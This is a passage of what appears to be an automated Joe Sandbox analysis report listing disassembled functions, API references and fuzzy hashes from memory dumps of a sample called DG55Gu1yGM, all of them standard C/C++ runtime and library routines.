Opcode Fuzzy Hash: 089065164f7acbcee2a009b1ab595d824f5b463daa05b22f9118c45ebaa118bc
Instruction Fuzzy Hash: DA51B173A60226EFDB258F64CC60EAF77AAEB44754F2546A8FC24D7150DBB4DC40CA90

Function 0214E419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0214E445
__cftoe.LIBCMT ref: 0214E477

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 6290ddc8ebea7097b1647a61380f344cd02ada4a64146fe838c0f2f7cf2ccb9a
Instruction ID: c090051b9e0b3fb34ec80d64b3a6221d45682efaec1f360175ac73d10a66849e
Opcode Fuzzy Hash: 6290ddc8ebea7097b1647a61380f344cd02ada4a64146fe838c0f2f7cf2ccb9a
Instruction Fuzzy Hash: F2510576980205EFDF249F688C44FAE77AAFF48374F544269F82DD6181EF31D9018AA4

Function 0214302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02143051

Part of subcall function 02138AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02138ABD

SafeSQueue.LIBCONCRT ref: 0214306A
Concurrency::location::_Assign.LIBCMT ref: 0214312A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0214314B
__CxxThrowException@8.LIBVCRUNTIME ref: 02143159

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3496964030-0
Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction ID: a59c9083411b37e7c858f9495cc516635045321fc942d25b6db84e045e7e18ab
Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction Fuzzy Hash: 2831D331A406119FCB29EF74C844B6AB7B2FF44720F2546A9E81A9B251DF70E945CFD0

Function 02148F24 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 02148F77
FindMITargetTypeInstance.LIBVCRUNTIME ref: 02148F90
FindVITargetTypeInstance.LIBVCRUNTIME ref: 02148F97
PMDtoOffset.LIBCMT ref: 02148FB6

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID:
API String ID: 1467055271-0
Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction ID: a4ffea9d599d67290872933117d673b6ec33001b8715d9164d5a2a152ae5e845
Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction Fuzzy Hash: 52212B72A842059FDF18DF68DC45EAE77B6EF44750B15832AE91C93580EF31E901CA94

Function 02125437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 0212544B
__Mtx_init.LIBCPMT ref: 02125471
std::_Cnd_initX.LIBCPMT ref: 02125494
__Thrd_start.LIBCPMT ref: 021254B9
std::_Cnd_waitX.LIBCPMT ref: 021254D9
std::_Cnd_initX.LIBCPMT ref: 02125506

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: c4ab08959bf19873d5a5957821a141eeeeeef892072d7081a3f1ca23daf5b54a
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: 5A219471C84268AEDF15EBB4E844BDEB7FAAF08325F544019F404B7180DB749A588B65

Function 02149041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,02149038,021469C9,02160907,00000008,02160C6C,?,?,?,?,02143CB2,?,?,0045A064), ref: 0214904F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0214905D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02149076
SetLastError.KERNEL32(00000000,?,02149038,021469C9,02160907,00000008,02160C6C,?,?,?,?,02143CB2,?,?,0045A064), ref: 021490C8

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 66ffce238b8d109233cc1d69ed3f6851066a1bc5ecb6181041923873127f65eb
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 9701F7322C97116EA7282BF4AC88E672749EF45776B300339F92C472E0EF12A8105989

Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,226C369D), ref: 00428DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,226C369D), ref: 00428E61

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D

Function 02124FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02124FCA
int.LIBCPMT ref: 02124FE1

Part of subcall function 0212BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0212BFD4
Part of subcall function 0212BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0212BFEE

std::locale::_Getfacet.LIBCPMT ref: 02124FEA
std::_Facet_Register.LIBCPMT ref: 0212501B
std::_Lockit::~_Lockit.LIBCPMT ref: 02125031
__CxxThrowException@8.LIBVCRUNTIME ref: 0212504F

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 89706a8a916db62eb132f9b1f4a4b96784c6be632b12e1a502c4323787b5249f
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: BF11C232980238AFCB29EB64CC40BAE77B2BF04354F550519F415AB2D0DB749A19CFD4

Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
int.LIBCPMT ref: 00404D7A

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404D83
std::_Facet_Register.LIBCPMT ref: 00404DB4
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: f6c010546c9a6aab71d76984e3b3a56c50bb37f9d4fd5e14535c7cf2849aeaa2
Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
Opcode Fuzzy Hash: f6c010546c9a6aab71d76984e3b3a56c50bb37f9d4fd5e14535c7cf2849aeaa2
Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD

Function 0212C3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0212C401
int.LIBCPMT ref: 0212C418

Part of subcall function 0212BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0212BFD4
Part of subcall function 0212BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0212BFEE

std::locale::_Getfacet.LIBCPMT ref: 0212C421
std::_Facet_Register.LIBCPMT ref: 0212C452
std::_Lockit::~_Lockit.LIBCPMT ref: 0212C468
__CxxThrowException@8.LIBVCRUNTIME ref: 0212C486

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: fbb7e9ef5ab90cef67f37a3d31bff7b8353132e40064778a780f2b1e7b66f473
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: 2311CE728802389FCB19EBA4D804AEE7772AF44714F61051AF511AB2D0DF349A19CFD4

Function 02124E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02124E8C
int.LIBCPMT ref: 02124EA3

Part of subcall function 0212BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0212BFD4
Part of subcall function 0212BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0212BFEE

std::locale::_Getfacet.LIBCPMT ref: 02124EAC
std::_Facet_Register.LIBCPMT ref: 02124EDD
std::_Lockit::~_Lockit.LIBCPMT ref: 02124EF3
__CxxThrowException@8.LIBVCRUNTIME ref: 02124F11

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 9c76238712b68e493fdd392e0cfc861d8c8fa69f6d5121d94260d1d3ff38605f
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: B411AC328802399FCB19EBA4D800AAE77B2AF44314F240519F411A72D0DB789A19CF95

Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
int.LIBCPMT ref: 0040C1B1

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
std::_Facet_Register.LIBCPMT ref: 0040C1EB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10aa9e1201f5f3f7416b02b9edb1f058c39ec3f43568e2087a01ea537f42d87b
Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
Opcode Fuzzy Hash: 10aa9e1201f5f3f7416b02b9edb1f058c39ec3f43568e2087a01ea537f42d87b
Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99

Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
int.LIBCPMT ref: 004054FA

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00405503
std::_Facet_Register.LIBCPMT ref: 00405534
std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
__CxxThrowException@8.LIBVCRUNTIME ref: 00405568

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: e9dd33c628eb01dd71e58123e4f12a767f9f28c2de7f76e3991a704fb5513a9b
Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
Opcode Fuzzy Hash: e9dd33c628eb01dd71e58123e4f12a767f9f28c2de7f76e3991a704fb5513a9b
Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C

Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
int.LIBCPMT ref: 00404C3C

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404C45
std::_Facet_Register.LIBCPMT ref: 00404C76
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 4b9b4a6b9052ba89dd6e642b69d507a7ec0134249dae4d4270acfb68f36c0c35
Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
Opcode Fuzzy Hash: 4b9b4a6b9052ba89dd6e642b69d507a7ec0134249dae4d4270acfb68f36c0c35
Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98

Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E6A

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
__Getcoll.LIBCPMT ref: 00404EC4
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4

Strings

fJ@, xrefs: 00404EBE

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: fJ@
API String ID: 1836011271-3478227103
Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99

Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A

Strings

mscoree.dll, xrefs: 0042FEFD
CorExitProcess, xrefs: 0042FF0F

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C

Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66

Strings

pScheduler, xrefs: 0041CE50

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D

Function 021608F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 021608F8
make_shared.LIBCPMT ref: 02160943

Strings

RCC, xrefs: 0216092A
v)D, xrefs: 021608F3
MOC, xrefs: 0216091B

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$v)D
API String ID: 3472968176-3108830043
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: f056316da3880de9c1bba99a6440414b2aa7c225cfaa235483e429618d448be6
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: B8F08C31A80264CFEB16EF64C40466C3B76BF0AB08F458091F4085B264CBB84A58CFA1

Function 0214B36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: c1b067d8dd5c4cbaa073c0a3d0fc2a94e727558fa04a59abf97f0bd615b71a17
Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: AE71C371D882169BCB258F59C884ABFFB75FF4531CF594629E4199B180DF70CA42CBA0

Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9

Function 02150CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0215390E: RtlAllocateHeap.NTDLL(00000000,0212DAD7,00000000), ref: 02153940

_free.LIBCMT ref: 02150DB6
_free.LIBCMT ref: 02150DCD
_free.LIBCMT ref: 02150DEC
_free.LIBCMT ref: 02150E07
_free.LIBCMT ref: 02150E1E

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
Instruction ID: 83541776387f045e54bfb015b11826f36572d70be14c8cb656854d5bd3707b88
Opcode Fuzzy Hash: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
Instruction Fuzzy Hash: 0D519071A80714EFDB25DF69D881B6AB7F5EF4C724B1405A9EC29D7250E732E901CB80

Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

_free.LIBCMT ref: 00430B4F
_free.LIBCMT ref: 00430B66
_free.LIBCMT ref: 00430B85
_free.LIBCMT ref: 00430BA0
_free.LIBCMT ref: 00430BB7

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88

Function 02151742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 021517B4
_free.LIBCMT ref: 021517D4

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: 0ea6e3ee7efe9479a674c2c93f6622d7c4a2d5bc1283b0b774611bd10c29da33
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: B441CF36A40214EFCB25DF78C880B5EB7E6EF89714B1545A9D929EB391D731E901CB80

Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043154D
_free.LIBCMT ref: 0043156D

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84

Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
__alloca_probe_16.LIBCMT ref: 00436922
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
__freea.LIBCMT ref: 0043698E

